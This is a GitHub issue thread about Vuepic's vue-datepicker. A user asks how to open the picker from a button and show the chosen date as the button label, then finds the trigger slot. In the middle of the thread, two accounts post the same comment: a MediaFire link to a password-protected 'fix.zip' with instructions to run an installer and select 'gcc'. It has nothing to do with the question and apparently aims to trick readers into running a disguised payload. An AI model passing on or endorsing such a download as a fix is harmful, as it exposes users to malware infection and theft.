### ISSUE TITLE
How do I toggle menu on button but hide the input field? Instead of input the label of button should get changed to selected date

### ISSUE THREAD

**Issue by yashwp** [Vuepic/vue-datepicker#977]
I need to open VueDatePicker at the click of a button. Once the dates are selected, the button's label shall change with the selected date.

UI 
1. ![image](https://github.com/user-attachments/assets/29b1d153-923c-4fdd-924f-44bb8c414222)

2. ![image](https://github.com/user-attachments/assets/4ba236b2-fcd7-4eb4-8779-d98a604176b5)

Taking about UI as expected output: When I click on 'Custom' button, the datepicker shall open, below it and once date selection is done, the selected date should be displayed as screenshot two.

Current Ouput-
![image](https://github.com/user-attachments/assets/2e33d3df-b67f-4508-9773-5495c93b1414)

```
<button class="filter-component__button filter-component__button--first" @click="openDp">
   Custom
   <VueDatePicker v-model="date" ref="datepicker" :hide-input-icon="true" placeholder="Custom dates"
           auto-apply range multi-calendars :enableTimePicker = "false" />
</button>


script:

const showDp = () => {
  if (datepicker.value) {
    // Close the menu programmatically
    datepicker.value.toggleMenu();
  }
};
```

How can I achieve the above? Link on the

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yashwp** [comment]
I found that there is something called slots: CODE BELOW.

When I use `range` preset, I'm not able to select dates. If remove `range` in the below setup, it calendar starts working.

```
<VueDatePicker class="filter-button" v-model="date" format="dd MMM yy"
                     :teleport="true" auto-apply range multi-calendars :enableTimePicker = "false">
        <template #trigger>
          <div>
            {{ date ?? 'Custom' }}
          </div>
        </template>
      </VueDatePicker>
      ```

**Comment by yashwp** [comment]
Ahh. Nevermind, the App restarted and it started working! I mean WTF :/
